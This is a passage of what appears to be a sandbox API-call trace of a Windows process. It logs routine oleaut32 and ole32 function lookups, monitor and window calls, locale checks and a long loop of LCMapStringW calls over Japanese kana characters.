lpVersionInformation=0x33e4fb4e50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33e4fb4e50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0058.654] GetModuleHandleA (lpModuleName="USER32") returned 0x7ffd086f0000 [0058.655] GetProcAddress (hModule=0x7ffd086f0000, lpProcName="GetSystemMetrics") returned 0x7ffd086ff150 [0058.655] GetProcAddress (hModule=0x7ffd086f0000, lpProcName="MonitorFromWindow") returned 0x7ffd086f8a40 [0058.656] GetProcAddress (hModule=0x7ffd086f0000, lpProcName="MonitorFromRect") returned 0x7ffd086f7990 [0058.656] GetProcAddress (hModule=0x7ffd086f0000, lpProcName="MonitorFromPoint") returned 0x7ffd086f6c10 [0058.656] GetProcAddress (hModule=0x7ffd086f0000, lpProcName="EnumDisplayMonitors") returned 0x7ffd087239e0 [0058.657] GetProcAddress (hModule=0x7ffd086f0000, lpProcName="GetMonitorInfoA") returned 0x7ffd086f7e90 [0058.657] GetProcAddress (hModule=0x7ffd086f0000, lpProcName="EnumDisplayDevicesA") returned 0x7ffd08711b50 [0058.657] MonitorFromWindow (hwnd=0x60040, dwFlags=0x2) returned 0x10001 [0058.657] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x33e4fb5060 | out: lpmi=0x33e4fb5060) returned 1 [0058.657] SetWindowPos (hWnd=0x60040, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0058.657] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x46, wParam=0x0, lParam=0x33e4fb4fc0) returned 0x0 [0058.658] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x47, wParam=0x0, lParam=0x33e4fb4fc0) returned 0x0 [0058.658] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0058.658] GetWindowThreadProcessId (in: hWnd=0x60040, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0058.658] GetVersion () returned 0x3ad7000a [0058.658] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x7ffd09590000 [0058.659] GetProcAddress (hModule=0x7ffd09590000, lpProcName="DispCallFunc") returned 0x7ffd09598de0 [0058.659] GetProcAddress (hModule=0x7ffd09590000, lpProcName="LoadTypeLibEx") returned 0x7ffd095a03c0 [0058.659] GetProcAddress (hModule=0x7ffd09590000, lpProcName="UnRegisterTypeLib") returned 0x7ffd095c4020 [0058.660] GetProcAddress (hModule=0x7ffd09590000, lpProcName="CreateTypeLib2") returned 0x7ffd095ab880 [0058.660] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDateFromUdate") returned 0x7ffd095a1f50 [0058.661] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarUdateFromDate") returned 0x7ffd0959f5c0 [0058.661] GetProcAddress (hModule=0x7ffd09590000, lpProcName="GetAltMonthNames") returned 0x7ffd095ebd10 [0058.661] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarNumFromParseNum") returned 0x7ffd0959efd0 [0058.662] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarParseNumFromStr") returned 0x7ffd0959df60 [0058.662] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDecFromR4") returned 0x7ffd09592190 [0058.662] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDecFromR8") returned 0x7ffd09591eb0 [0058.663] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDecFromDate") returned 0x7ffd095f1f60 [0058.663] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDecFromI4") returned 0x7ffd09591b80 [0058.664] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDecFromCy") returned 0x7ffd095f1f30 [0058.664] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarR4FromDec") returned 0x7ffd095f23b0 [0058.664] GetProcAddress (hModule=0x7ffd09590000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7ffd095f07c0 [0058.665] GetProcAddress (hModule=0x7ffd09590000, lpProcName="GetRecordInfoFromGuids") returned 0x7ffd095f0650 [0058.665] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SafeArrayGetRecordInfo") returned 0x7ffd095f19e0 [0058.665] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SafeArraySetRecordInfo") returned 0x7ffd095f1a50 [0058.666] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SafeArrayGetIID") returned 0x7ffd095f19b0 [0058.666] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SafeArraySetIID") returned 0x7ffd09593700 [0058.667] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SafeArrayCopyData") returned 0x7ffd095926b0 [0058.667] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7ffd09592c30 [0058.667] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SafeArrayCreateEx") returned 0x7ffd095f1870 [0058.668] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarFormat") returned 0x7ffd095f6540 [0058.668] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarFormatDateTime") returned 0x7ffd095f6750 [0058.669] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarFormatNumber") returned 0x7ffd095f67d0 [0058.669] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarFormatPercent") returned 0x7ffd095f68e0 [0058.669] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarFormatCurrency") returned 0x7ffd095f6630 [0058.670] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarWeekdayName") returned 0x7ffd095f6d20 [0058.670] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarMonthName") returned 0x7ffd095f69d0 [0058.671] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarAdd") returned 0x7ffd095e2760 [0058.671] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarAnd") returned 0x7ffd095e5000 [0058.672] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarCat") returned 0x7ffd095e3150 [0058.672] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDiv") returned 0x7ffd095e32a0 [0058.672] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarEqv") returned 0x7ffd095e5190 [0058.673] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarIdiv") returned 0x7ffd095e51c0 [0058.673] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarImp") returned 0x7ffd095e5380 [0058.673] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarMod") returned 0x7ffd095e5470 [0058.674] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarMul") returned 0x7ffd095e3930 [0058.674] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarOr") returned 0x7ffd095e5690 [0058.675] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarPow") returned 0x7ffd095e4220 [0058.675] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarSub") returned 0x7ffd095e4450 [0058.675] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarXor") returned 0x7ffd095e5830 [0058.676] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarAbs") returned 0x7ffd095e1950 [0058.676] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarFix") returned 0x7ffd095e1c40 [0058.676] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarInt") returned 0x7ffd095e1e40 [0058.677] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarNeg") returned 0x7ffd095e2020 [0058.677] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarNot") returned 0x7ffd095e55f0 [0058.678] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarRound") returned 0x7ffd095e23b0 [0058.678] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarCmp") returned 0x7ffd095a6710 [0058.678] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDecAdd") returned 0x7ffd095e64d0 [0058.679] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarDecCmp") returned 0x7ffd09591390 [0058.679] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarBstrCat") returned 0x7ffd095a74a0 [0058.679] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarCyMulI4") returned 0x7ffd09591560 [0058.680] GetProcAddress (hModule=0x7ffd09590000, lpProcName="VarBstrCmp") returned 0x7ffd095a6bd0 [0058.680] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7ffd08f10000 [0058.682] GetProcAddress (hModule=0x7ffd08f10000, lpProcName="CoCreateInstanceEx") returned 0x7ffd09726770 [0058.682] GetProcAddress (hModule=0x7ffd08f10000, lpProcName="CLSIDFromProgIDEx") returned 0x7ffd09714b70 [0058.682] GetSystemMetrics (nIndex=42) returned 0 [0058.682] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7ffce0bfc220 | out: ppMalloc=0x7ffce0bfc220*=0x7ffd098ff3f0) returned 0x0 [0058.682] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3986036f0 [0058.683] GetUserDefaultLCID () returned 0x412 [0058.683] GetUserDefaultLCID () returned 0x412 [0058.683] IsValidCodePage (CodePage=0x3a4) returned 1 [0058.684] IsValidCodePage (CodePage=0x3b5) returned 1 [0058.684] IsValidCodePage (CodePage=0x3b6) returned 1 [0058.684] IsValidCodePage (CodePage=0x3a8) returned 1 [0058.684] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="぀", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.684] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぁ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.684] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="あ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.684] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぃ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.684] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="い", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="う", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぇ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="え", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぉ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="お", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="か", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.685] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="が", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.686] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="き", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.686] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぎ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.686] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="く", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.686] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぐ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.686] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="け", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.686] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="げ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.686] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="こ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ご", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="さ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ざ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="し", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="じ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="す", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ず", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="せ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぜ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="そ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぞ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="た", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="だ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ち", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぢ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="っ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="つ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="づ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="て", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="で", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="と", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ど", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="な", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="に", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぬ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ね", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="の", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="は", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ば", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぱ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ひ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="び", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.687] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ふ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぶ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぷ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="へ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="べ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぺ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ほ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぼ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぽ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ま", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="み", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="む", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="め", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="も", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゃ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="や", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゆ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ょ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="よ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ら", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="り", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="る", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="れ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ろ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゎ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="わ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゐ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゑ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="を", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ん", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゔ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゕ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゖ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゗", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゘", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.688] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゙", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゚", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゛", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゜", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゝ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゞ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゟ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゠", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ァ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ア", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ィ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="イ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゥ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ウ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ェ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="エ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ォ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="オ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="カ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW 